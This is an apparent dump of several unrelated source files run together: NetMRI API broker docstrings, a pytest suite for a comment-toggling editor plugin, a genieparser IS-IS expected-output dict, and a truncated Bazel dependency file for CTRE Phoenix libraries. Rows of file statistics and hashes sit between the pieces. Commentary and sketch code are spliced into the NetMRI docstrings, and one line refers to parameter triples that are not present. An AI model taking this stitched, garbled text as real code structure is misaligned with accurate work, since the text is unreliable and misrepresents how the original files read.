:param timestamp: The data returned will represent the if addrs as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of if addr methods. The listed methods will be called on each if addr returned and included in the output. Available methods are: vrf_name, vrf_description, vrf_rd, network_id, cap_if_net_provisioning_ipv4_ind, cap_if_net_provisioning_ipv6_ind, cap_if_net_deprovisioning_ipv4_ind, cap_if_net_deprovisioning_ipv6_ind, meta, data_source, device, interface.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: meta, data_source, device, interface.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
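The start/limit paging rule described here can be sketched as a simple slice (an illustrative model of the documented behavior, not the server-side implementation; the function name is a stand-in):

```python
# Illustrative model of start/limit paging: "limit" is the page size and
# "start" is the zero-based index of the first record of interest.
def page(records, start=0, limit=1000):
    # A real API call also enforces a maximum limit of 10000; here we just slice.
    return records[start:start + limit]

records = list(range(100))
# With 100 records, limit=10 and start=10 you get records 10-19:
assert page(records, start=10, limit=10) == list(range(10, 20))
```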
:param sort: The data field(s) to use for sorting the output. Default is IfAddrID. Valid values are IfAddrID, InterfaceID, DeviceID, ifIndex, DataSourceID, AddrStartTime, AddrEndTime, AddrChangedCols, AddrTimestamp, ifIPDotted, ifIPNumeric, ifNetMaskDotted, ifNetMaskNumeric, SubnetIPNumeric, SubnetIPDotted, AciBdID, AciEpgID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` IfAddrID
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param select: The list of attributes to return for each IfAddr. Valid values are IfAddrID, InterfaceID, DeviceID, ifIndex, DataSourceID, AddrStartTime, AddrEndTime, AddrChangedCols, AddrTimestamp, ifIPDotted, ifIPNumeric, ifNetMaskDotted, ifNetMaskNumeric, SubnetIPNumeric, SubnetIPDotted, AciBdID, AciEpgID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if not combined with database-level filtering.
:type xml_filter: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
**Outputs**
:return if_addrs: An array of the IfAddr objects that match the specified input criteria.
:rtype if_addrs: Array of IfAddr
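Each op_.../val_f_.../val_c_... triple above follows the same pattern. As a rough sketch of how such a triple could be turned into a filter predicate (illustrative only — the function name and quoting are assumptions, not the actual NetMRI server logic):

```python
def build_predicate(field, op, val_c=None, val_f=None):
    """Build an SQL-like predicate string for one filtered field (sketch)."""
    if op in ("is null", "is not null"):
        return f"{field} {op}"                      # unary operators take no value
    if val_f is not None:
        return f"{field} {op} {val_f}"              # val_f_: compare to another field
    if op == "between":
        lo, hi = val_c.split(",")                   # comma-delimited pair of bounds
        return f"{field} BETWEEN {lo} AND {hi}"
    return f"{field} {op} {val_c!r}"                # val_c_: compare to a constant

print(build_predicate("ifIndex", "between", val_c="1,10"))  # ifIndex BETWEEN 1 AND 10
```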
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def data_source(self, **kwargs):
"""The NetMRI device that collected this record.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The NetMRI device that collected this record.
:rtype : DataSource
"""
return self.api_request(self._get_method_fullname("data_source"), kwargs)
def interface(self, **kwargs):
"""The interface configured with this address.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The interface configured with this address.
:rtype : Interface
"""
return self.api_request(self._get_method_fullname("interface"), kwargs)
def infradevice(self, **kwargs):
"""The device containing the interface configured with this address.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device containing the interface configured with this address.
:rtype : InfraDevice
"""
return self.api_request(self._get_method_fullname("infradevice"), kwargs)
def network_id(self, **kwargs):
"""The Network View ID assigned to the interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The Network View ID assigned to the interface.
:rtype : Integer
"""
return self.api_request(self._get_method_fullname("network_id"), kwargs)
def vrf_name(self, **kwargs):
"""The VRF name assigned to the interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The VRF name assigned to the interface.
:rtype : String
"""
return self.api_request(self._get_method_fullname("vrf_name"), kwargs)
def vrf_description(self, **kwargs):
"""The VRF description of the vrf assigned to the interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The VRF description of the vrf assigned to the interface.
:rtype : String
"""
return self.api_request(self._get_method_fullname("vrf_description"), kwargs)
def vrf_rd(self, **kwargs):
"""The VRF route distinguisher of the vrf assigned to the interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The VRF route distinguisher of the vrf assigned to the interface.
:rtype : String
"""
return self.api_request(self._get_method_fullname("vrf_rd"), kwargs)
def cap_if_net_provisioning_ipv4_ind(self, **kwargs):
"""Capability to provision an ipv4 network on this interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability to provision an ipv4 network on this interface.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_if_net_provisioning_ipv4_ind"), kwargs)
def cap_if_net_provisioning_ipv6_ind(self, **kwargs):
"""Capability to provision an ipv6 network on this interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability to provision an ipv6 network on this interface.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_if_net_provisioning_ipv6_ind"), kwargs)
def cap_if_net_deprovisioning_ipv4_ind(self, **kwargs):
"""Capability of de-provisioning an ipv4 network from this interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of de-provisioning an ipv4 network from this interface.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_if_net_deprovisioning_ipv4_ind"), kwargs)
def cap_if_net_deprovisioning_ipv6_ind(self, **kwargs):
"""Capability of de-provisioning an ipv6 network from this interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of de-provisioning an ipv6 network from this interface.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_if_net_deprovisioning_ipv6_ind"), kwargs)
def device(self, **kwargs):
"""The device containing the interface configured with this address.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device containing the interface configured with this address.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
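All of the helper methods above share one dispatch pattern: forward their keyword arguments to a generic request with a fully qualified method name. A self-contained sketch of that pattern (FakeBroker and the echoed response are stand-ins for the real HTTP client, which issues a network call instead):

```python
# Minimal sketch of the broker dispatch pattern used by the methods above.
class FakeBroker:
    controller = "if_addrs"  # assumed controller name for illustration

    def _get_method_fullname(self, method):
        # Qualify the method with its controller, e.g. "if_addrs/vrf_name".
        return f"{self.controller}/{method}"

    def api_request(self, method_name, params):
        # A real broker would issue an HTTP request; we just echo it back.
        return {"method": method_name, "params": params}

    def vrf_name(self, **kwargs):
        return self.api_request(self._get_method_fullname("vrf_name"), kwargs)

broker = FakeBroker()
result = broker.vrf_name(IfAddrID=42)
# result == {"method": "if_addrs/vrf_name", "params": {"IfAddrID": 42}}
```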
| 52.15614 | 633 | 0.613811 | 11,072 | 89,187 | 4.84655 | 0.029624 | 0.071188 | 0.046272 | 0.053223 | 0.962617 | 0.961853 | 0.942957 | 0.928123 | 0.915768 | 0.913494 | 0 | 0.005374 | 0.303183 | 89,187 | 1,709 | 634 | 52.186659 | 0.858078 | 0.812484 | 0 | 0 | 0 | 0 | 0.102935 | 0.057819 | 0 | 0 | 0 | 0 | 0 | 1 | 0.457143 | false | 0 | 0.028571 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
589f0c205d4607f4990351a29b6338cc7ecb355c | 2,810 | py | Python | tests/test_comment_block_plugin.py | Akuli/editor | cf98c538e75a07d825f9066e25a3752fdf7c3c29 | [
"MIT"
] | 65 | 2017-05-23T00:23:07.000Z | 2022-03-17T21:07:12.000Z | tests/test_comment_block_plugin.py | Akuli/editor | cf98c538e75a07d825f9066e25a3752fdf7c3c29 | [
"MIT"
] | 689 | 2017-03-17T15:42:04.000Z | 2022-03-29T19:43:40.000Z | tests/test_comment_block_plugin.py | Akuli/editor | cf98c538e75a07d825f9066e25a3752fdf7c3c29 | [
"MIT"
] | 28 | 2017-03-13T19:41:34.000Z | 2022-01-29T00:47:29.000Z | def test_comment_block_and_undo(filetab):
    filetab.textwidget.insert("1.0", "foo\nbar\nbaz")
    filetab.textwidget.tag_add("sel", "1.0", "end - 1 char")
    filetab.textwidget.event_generate("<numbersign>")  # hashtag key press
    filetab.textwidget.insert("end - 1 char", "lol")
    assert filetab.textwidget.get("1.0", "end - 1 char") == "#foo\n#bar\n#bazlol"
    filetab.textwidget.edit_undo()
    assert filetab.textwidget.get("1.0", "end - 1 char") == "#foo\n#bar\n#baz"
    filetab.textwidget.edit_undo()
    assert filetab.textwidget.get("1.0", "end - 1 char") == "foo\nbar\nbaz"
    filetab.textwidget.edit_undo()
    assert filetab.textwidget.get("1.0", "end - 1 char") == ""


def test_partially_commented(filetab):
    filetab.textwidget.insert(
        "1.0",
        """\
We select starting from this line
# This comment is not touched at all because it appears to be hand-written
#
To start of this line, so that the plugin shouldn't see this line as selected
""",
    )
    filetab.textwidget.tag_add("sel", "1.0", "4.0")
    filetab.textwidget.event_generate("<numbersign>")
    assert (
        filetab.textwidget.get("1.0", "end - 1 char")
        == """\
#We select starting from this line
## This comment is not touched at all because it appears to be hand-written
#
To start of this line, so that the plugin shouldn't see this line as selected
"""
    )
    filetab.textwidget.event_generate("<numbersign>")
    assert (
        filetab.textwidget.get("1.0", "end - 1 char")
        == """\
We select starting from this line
# This comment is not touched at all because it appears to be hand-written
To start of this line, so that the plugin shouldn't see this line as selected
"""
    )


def test_cant_uncomment_bug(filetab):
    filetab.textwidget.insert(
        "1.0",
        """\
def __init__(self, f):
    self._i_opened_the_file = None
    try:
        self.initfp(f)
    except:
        if self._i_opened_the_file:
            f.close()
        raise
""",
    )
    filetab.textwidget.tag_add("sel", "3.8", "3.8 + 5 lines")
    filetab.textwidget.event_generate("<numbersign>")
    assert (
        filetab.textwidget.get("1.0", "end - 1 char")
        == """\
def __init__(self, f):
    self._i_opened_the_file = None
#    try:
#        self.initfp(f)
#    except:
#        if self._i_opened_the_file:
#            f.close()
#        raise
"""
    )
    filetab.textwidget.event_generate("<numbersign>")
    assert (
        filetab.textwidget.get("1.0", "end - 1 char")
        == """\
def __init__(self, f):
    self._i_opened_the_file = None
    try:
        self.initfp(f)
    except:
        if self._i_opened_the_file:
            f.close()
        raise
"""
    )
| 29.270833 | 81 | 0.6 | 378 | 2,810 | 4.312169 | 0.224868 | 0.239877 | 0.04908 | 0.033129 | 0.913497 | 0.866871 | 0.807975 | 0.784049 | 0.784049 | 0.784049 | 0 | 0.020723 | 0.261566 | 2,810 | 95 | 82 | 29.578947 | 0.764819 | 0.00605 | 0 | 0.478873 | 1 | 0 | 0.468908 | 0.039496 | 0 | 0 | 0 | 0 | 0.112676 | 1 | 0.042254 | false | 0 | 0 | 0 | 0.042254 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
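The tests above drive a comment-block plugin through Tk events and assert a simple toggle behaviour: a "#" is prepended to every selected line, and a second press removes it. A minimal sketch of that toggle as a pure string function (the function name and the all-or-nothing rule are assumptions for illustration, not the plugin's actual implementation):

```python
def toggle_comment(text: str, prefix: str = "#") -> str:
    """Toggle *prefix* on every line of *text*.

    If every line already starts with the prefix, strip it from each line;
    otherwise prepend it to each line (hypothetical all-or-nothing sketch).
    """
    lines = text.split("\n")
    if all(line.startswith(prefix) for line in lines):
        return "\n".join(line[len(prefix):] for line in lines)
    return "\n".join(prefix + line for line in lines)
```

Toggling twice round-trips back to the original text, which is what the undo-based assertions above rely on.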
543fd2bc4208e6faa5f1f55e190015d773ca80ca | 396 | py | Python | src/genie/libs/parser/iosxe/tests/ShowIsisNodeSummary/cli/equal/golden_output_expected.py | nielsvanhooy/genieparser | 9a1955749697a6777ca614f0af4d5f3a2c254ccd | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxe/tests/ShowIsisNodeSummary/cli/equal/golden_output_expected.py | nielsvanhooy/genieparser | 9a1955749697a6777ca614f0af4d5f3a2c254ccd | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxe/tests/ShowIsisNodeSummary/cli/equal/golden_output_expected.py | nielsvanhooy/genieparser | 9a1955749697a6777ca614f0af4d5f3a2c254ccd | [
"Apache-2.0"
] | null | null | null | expected_output={
'tag': {
'nSVL-1': {
'level': {
'1': {
'switch': [
'sw.F87A4137BE0.00',
'sw.F87A4137BE0.01',
'sw.40B5C1FFEE0.00'
]
},
'2': {
'switch': [
'sw.F87A4137BE0.00',
'sw.F87A4137BE0.01',
'sw.40B5C1FFEE0.00'
]
}
}
}
}
} | 18 | 32 | 0.333333 | 28 | 396 | 4.678571 | 0.464286 | 0.396947 | 0.290076 | 0.320611 | 0.778626 | 0.778626 | 0.778626 | 0.778626 | 0.778626 | 0.778626 | 0 | 0.265 | 0.494949 | 396 | 22 | 33 | 18 | 0.39 | 0 | 0 | 0.363636 | 0 | 0 | 0.327456 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
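The `expected_output` above is a nested tag → level → switch dictionary as produced by a genieparser golden test. A small sketch of walking that structure to flatten it into a `(tag, level)` lookup (the helper name is an assumption for illustration):

```python
expected_output = {
    'tag': {
        'nSVL-1': {
            'level': {
                '1': {'switch': ['sw.F87A4137BE0.00', 'sw.F87A4137BE0.01', 'sw.40B5C1FFEE0.00']},
                '2': {'switch': ['sw.F87A4137BE0.00', 'sw.F87A4137BE0.01', 'sw.40B5C1FFEE0.00']},
            }
        }
    }
}


def switches_per_level(parsed):
    # Flatten the tag -> level -> switch hierarchy into {(tag, level): [switches]}.
    out = {}
    for tag, tag_data in parsed['tag'].items():
        for level, level_data in tag_data['level'].items():
            out[(tag, level)] = level_data['switch']
    return out
```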
54b2b1337073fc7419de2553dbf9c9e405285ae4 | 14,960 | bzl | Python | bazelrio/dependencies/phoenix/5_20_2/deps.bzl | noamzaks/bazelrio | 1684b66865e655fc0f3832f0e3602e905a1d4035 | [
"MIT"
] | 5 | 2021-09-26T01:16:26.000Z | 2022-03-18T17:21:23.000Z | bazelrio/dependencies/phoenix/5_20_2/deps.bzl | noamzaks/bazelrio | 1684b66865e655fc0f3832f0e3602e905a1d4035 | [
"MIT"
] | 59 | 2021-09-23T04:19:33.000Z | 2022-03-29T07:47:10.000Z | bazelrio/dependencies/phoenix/5_20_2/deps.bzl | noamzaks/bazelrio | 1684b66865e655fc0f3832f0e3602e905a1d4035 | [
"MIT"
] | 2 | 2021-11-18T10:34:16.000Z | 2021-11-21T06:15:07.000Z | load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
load("@bazel_tools//tools/build_defs/repo:jvm.bzl", "jvm_maven_import_external")
load("@bazel_tools//tools/build_defs/repo:utils.bzl", "maybe")
load("@bazelrio//:deps_utils.bzl", "cc_library_headers", "cc_library_shared")
def setup_phoenix_5_20_2_dependencies():
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_api-cpp_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/api-cpp/5.20.2/api-cpp-5.20.2-headers.zip",
sha256 = "a5c192134fe3bfa1a1d46518ee8fff861bc9f8dc34a2cb541a8bbd5d8ddbf818",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_api-cpp-sim_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/api-cpp-sim/5.20.2/api-cpp-sim-5.20.2-headers.zip",
sha256 = "a5c192134fe3bfa1a1d46518ee8fff861bc9f8dc34a2cb541a8bbd5d8ddbf818",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_cci_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/cci/5.20.2/cci-5.20.2-headers.zip",
sha256 = "1363afa72180fa59ee34d3ec9e4ccb98458fdf1f2b8b894b41547747466e86bc",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_cci-sim_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/cci-sim/5.20.2/cci-sim-5.20.2-headers.zip",
sha256 = "1363afa72180fa59ee34d3ec9e4ccb98458fdf1f2b8b894b41547747466e86bc",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simcancoder_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simCANCoder/5.20.2/simCANCoder-5.20.2-headers.zip",
sha256 = "f39ea63bb09ba8736dacf8a2f5fd4591912b466b8054dd88d3cbe01a1f943e57",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simpigeonimu_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simPigeonIMU/5.20.2/simPigeonIMU-5.20.2-headers.zip",
sha256 = "f39ea63bb09ba8736dacf8a2f5fd4591912b466b8054dd88d3cbe01a1f943e57",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonfx_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonFX/5.20.2/simTalonFX-5.20.2-headers.zip",
sha256 = "f39ea63bb09ba8736dacf8a2f5fd4591912b466b8054dd88d3cbe01a1f943e57",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonsrx_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonSRX/5.20.2/simTalonSRX-5.20.2-headers.zip",
sha256 = "f39ea63bb09ba8736dacf8a2f5fd4591912b466b8054dd88d3cbe01a1f943e57",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simvictorspx_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simVictorSPX/5.20.2/simVictorSPX-5.20.2-headers.zip",
sha256 = "f39ea63bb09ba8736dacf8a2f5fd4591912b466b8054dd88d3cbe01a1f943e57",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_wpiapi-cpp_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/wpiapi-cpp/5.20.2/wpiapi-cpp-5.20.2-headers.zip",
sha256 = "ea0f94efa884896a7fe6071e22d1a5fd87076b4e8a838bac5493dbb1b5b3baf6",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_wpiapi-cpp-sim_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/wpiapi-cpp-sim/5.20.2/wpiapi-cpp-sim-5.20.2-headers.zip",
sha256 = "ea0f94efa884896a7fe6071e22d1a5fd87076b4e8a838bac5493dbb1b5b3baf6",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_api-cpp_linuxathena",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/api-cpp/5.20.2/api-cpp-5.20.2-linuxathena.zip",
sha256 = "e77de35f12871595cfece1316d9a8e0f168590f38b0162c0419289784d4ea283",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_api-cpp-sim_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/api-cpp-sim/5.20.2/api-cpp-sim-5.20.2-windowsx86-64.zip",
sha256 = "30e0a6c44f5e79785750bbdc12a3c2fcbca01f03ee360350930c04b154176504",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_api-cpp-sim_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/api-cpp-sim/5.20.2/api-cpp-sim-5.20.2-linuxx86-64.zip",
sha256 = "6a95f11d9a0763d72cffe47429f7b7fce4463759581cd8b2ce8ba56f50206dce",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_api-cpp-sim_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/api-cpp-sim/5.20.2/api-cpp-sim-5.20.2-osxx86-64.zip",
sha256 = "aa4f6b923d82a1585d9df84996fd725481b985b436ef8f45e54c3c522e2c14a2",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_cci_linuxathena",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/cci/5.20.2/cci-5.20.2-linuxathena.zip",
sha256 = "c056bb3856003f7bcceef8082907852a6d6ecc76cee9d6d615020b7f07795e72",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_cci-sim_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/cci-sim/5.20.2/cci-sim-5.20.2-windowsx86-64.zip",
sha256 = "c370dc11c328bf006c44771bc0b78027af296ed3a9b826fc9664b88ef5aabfd9",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_cci-sim_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/cci-sim/5.20.2/cci-sim-5.20.2-linuxx86-64.zip",
sha256 = "80cf04aecf8ab12335e5c7281b572a52db16fd7b8ff04651ae655815fcc112f5",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_cci-sim_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/cci-sim/5.20.2/cci-sim-5.20.2-osxx86-64.zip",
sha256 = "e0eec6bb14e99936fbd05b285c34dffb4675ed32e019e3d578b4b469b931c8b5",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simcancoder_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simCANCoder/5.20.2/simCANCoder-5.20.2-windowsx86-64.zip",
sha256 = "fcc8f8aeb3748d8037909ce81c0b4550d11e02f72dc89c14884a8b0266b17514",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simcancoder_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simCANCoder/5.20.2/simCANCoder-5.20.2-linuxx86-64.zip",
sha256 = "8498bfeef19037e528646e207b593c79d68d79fb9881ac1873262dcc38b1285b",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simcancoder_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simCANCoder/5.20.2/simCANCoder-5.20.2-osxx86-64.zip",
sha256 = "b47da2d29a03a801876299777ca6913206930076104f66000e9a4f5f6e3cf4bf",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simpigeonimu_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simPigeonIMU/5.20.2/simPigeonIMU-5.20.2-windowsx86-64.zip",
sha256 = "a4cabfafa914af7f1c2e0f35bec07e0a70644bc69739a476d090f88dc093bebe",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simpigeonimu_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simPigeonIMU/5.20.2/simPigeonIMU-5.20.2-linuxx86-64.zip",
sha256 = "a450c52ac436d4dddfcaa0f58f88ae8acf854bd995bc9a27c8877706b1346421",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simpigeonimu_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simPigeonIMU/5.20.2/simPigeonIMU-5.20.2-osxx86-64.zip",
sha256 = "935e1e6df926ea7f8e0b87e35505371a1194240d05d7c305630375b93ebfddad",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonfx_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonFX/5.20.2/simTalonFX-5.20.2-windowsx86-64.zip",
sha256 = "e6263df262ff5e450d473d07c2ba44aede7b0bfc1187d28023097e9f1f2dc3bc",
